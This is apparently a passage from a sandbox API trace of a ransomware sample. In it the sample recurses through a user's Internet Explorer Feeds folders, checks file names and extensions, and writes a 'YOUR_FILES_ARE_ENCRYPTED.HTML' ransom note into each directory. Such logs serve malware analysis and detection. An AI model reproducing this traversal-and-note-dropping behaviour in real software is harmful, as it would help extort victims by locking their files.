ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0159.112] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.112] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd2617cf0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad77f44, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x60, cFileName="FeedsStore.feedsdb-ms", cAlternateFileName="FEEDSS~1.FEE")) returned 1 [0159.112] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms") returned 75 [0159.112] lstrcmpW (lpString1="FeedsStore.feedsdb-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.112] PathFindExtensionW (pszPath="FeedsStore.feedsdb-ms") returned=".feedsdb-ms" [0159.112] lstrlenW (lpString=".feedsdb-ms") returned 11 [0159.112] PathFindExtensionW (pszPath="FeedsStore.feedsdb-ms") returned=".feedsdb-ms" [0159.112] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab88d60, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft Feeds~", cAlternateFileName="MICROS~1")) returned 1 [0159.112] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~") returned 70 [0159.112] GetProcessHeap () returned 0x270000 [0159.112] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7422068 [0159.116] lstrcpyW (in: lpString1=0x7422068, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~" [0159.116] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\*" [0159.116] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab88d60, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0159.121] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab88d60, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.122] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd2617cf0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a9bfcdd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft at Home~.feed-ms", cAlternateFileName="MICROS~2.FEE")) returned 1 [0159.122] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms") returned 97 [0159.122] lstrcmpW (lpString1="Microsoft at Home~.feed-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.122] PathFindExtensionW (pszPath="Microsoft at Home~.feed-ms") returned=".feed-ms" [0159.122] lstrlenW (lpString=".feed-ms") returned 8 [0159.122] PathFindExtensionW (pszPath="Microsoft at Home~.feed-ms") returned=".feed-ms" [0159.122] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab3caa0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft at Work~.feed-ms", cAlternateFileName="MICROS~1.FEE")) returned 1 [0159.122] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Work~.feed-ms") returned 97 [0159.122] lstrcmpW (lpString1="Microsoft at Work~.feed-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.122] PathFindExtensionW (pszPath="Microsoft at Work~.feed-ms") returned=".feed-ms" [0159.122] lstrlenW (lpString=".feed-ms") returned 8 [0159.122] PathFindExtensionW (pszPath="Microsoft at Work~.feed-ms") returned=".feed-ms" [0159.122] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8abd5021, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSNBC News~.feed-ms", cAlternateFileName="MSNBCN~1.FEE")) returned 1 [0159.122] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms") returned 90 [0159.122] lstrcmpW (lpString1="MSNBC News~.feed-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.122] PathFindExtensionW (pszPath="MSNBC News~.feed-ms") returned=".feed-ms" [0159.122] lstrlenW (lpString=".feed-ms") returned 8 [0159.122] PathFindExtensionW (pszPath="MSNBC News~.feed-ms") returned=".feed-ms" [0159.122] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8abd5021, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSNBC News~.feed-ms", cAlternateFileName="MSNBCN~1.FEE")) returned 0 [0159.122] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0159.124] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 100 [0159.124] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0159.126] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0159.128] CloseHandle (hObject=0x5a8) returned 1 [0159.128] GetProcessHeap () returned 0x270000 [0159.130] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0159.130] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", cAlternateFileName="{5588A~1")) returned 1 [0159.130] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned 93 [0159.130] GetProcessHeap () returned 0x270000 [0159.130] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7422068 [0159.130] lstrcpyW (in: lpString1=0x7422068, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0159.130] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*" [0159.130] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0159.130] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.130] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="WebSlices~", cAlternateFileName="WEBSLI~1")) returned 1 [0159.130] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned 104 [0159.130] GetProcessHeap () returned 0x270000 [0159.130] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7432070 [0159.131] lstrcpyW (in: lpString1=0x7432070, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0159.131] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*" [0159.131] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0159.131] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.131] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad2bc83, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x60, cFileName="Web Slice Gallery~.feed-ms", cAlternateFileName="WEBSLI~1.FEE")) returned 1 [0159.131] wnsprintfW (in: pszDest=0x7432070, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms") returned 131 [0159.131] lstrcmpW (lpString1="Web Slice Gallery~.feed-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.131] PathFindExtensionW (pszPath="Web Slice Gallery~.feed-ms") returned=".feed-ms" [0159.131] lstrlenW (lpString=".feed-ms") returned 8 [0159.132] PathFindExtensionW (pszPath="Web Slice Gallery~.feed-ms") returned=".feed-ms" [0159.132] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad2bc83, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x60, cFileName="Web Slice Gallery~.feed-ms", cAlternateFileName="WEBSLI~1.FEE")) returned 0 [0159.132] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0159.132] wnsprintfW (in: pszDest=0x7432070, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 134 [0159.132] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x590 [0159.132] WriteFile (in: hFile=0x590, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0159.135] CloseHandle (hObject=0x590) returned 1 [0159.135] GetProcessHeap () returned 0x270000 [0159.136] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7432070 | out: hHeap=0x270000) returned 1 [0159.136] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="WebSlices~", cAlternateFileName="WEBSLI~1")) returned 0 [0159.136] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0159.140] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0159.140] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0159.141] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0159.143] CloseHandle (hObject=0x5a8) returned 1 [0159.143] GetProcessHeap () returned 0x270000 [0159.145] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0159.147] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acdf9c3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", cAlternateFileName="{5588A~1")) returned 0 [0159.147] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0159.151] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 83 [0159.151] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\feeds\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0159.152] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0159.154] CloseHandle (hObject=0x4a8) returned 1 [0159.154] GetProcessHeap () returned 0x270000 [0159.155] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0159.156] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a8b533b, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Feeds Cache", cAlternateFileName="FEEDSC~1")) returned 1 [0159.156] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache") returned 59 [0159.156] GetProcessHeap () returned 0x270000 [0159.156] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0159.156] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache" [0159.156] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\*" [0159.156] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a8b533b, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0159.156] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2016, 